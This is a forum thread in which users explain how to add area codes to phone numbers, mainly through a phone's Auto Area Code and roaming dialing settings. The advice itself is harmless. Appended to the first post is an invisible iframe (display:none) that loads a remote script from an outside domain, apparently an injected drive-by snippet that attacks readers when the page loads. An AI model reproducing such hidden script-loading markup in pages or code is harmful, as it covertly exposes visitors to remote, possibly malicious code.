Is there a simple app to add area codes

Most of my phone numbers locally do not have an area code in my address book. Now we must dial them. Is there a simple app to add them? Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Have you tried using the setting in the phone to allways dial your home area code? I live in one area code and work in another.

Open the Phone Prefs and under Dialing there is a setting for Auto Area Code. I have mine set on Always. It will then prefix any number you dial without an area code with the area code that matches your phone. Works from either dialing a number manually or from the address book.

If you sync with Outlook onthe PC, it adds area codes to all numbers (based onthe PC setting for local dialup)

I used this trick to add it to all mine.

Good luck

I found a program called Area Coder, by Steven Creek Software that helped me solve the same problem. Don't know if it's still around, as I originally used it when I first bought my 6035 about a hundred years ago.

The Auto Area Code setting in the PhonePrefs Dialing screen also has a Roaming setting, which will dial the 7-digit number when in your home area, and add the prefix when roaming. This is handy depending on how your home area is set up. (Mine is my state, which is all one area code, so this setting works perfectly for me.)

I am unclear on the roaming vs. automatic setting. What is the difference?

If in your local area you can't call using local numbers with the area code, that setting will just dial the 7 digits. But when you're roaming, which usually means you're out of your area code anyway, the call has to go through another carrier where you're at, at that point you'd need the area code to get back to your local numbers through their system and the roaming setting would add it. If you're not roaming, it doesn't matter where you are on your network, it's still local and the roaming setting wouldn't add it.

In San Diego where I live, I can dial next door with or without the area code so I always put the area code on all numbers in my address book, then I don't have to worry about it.
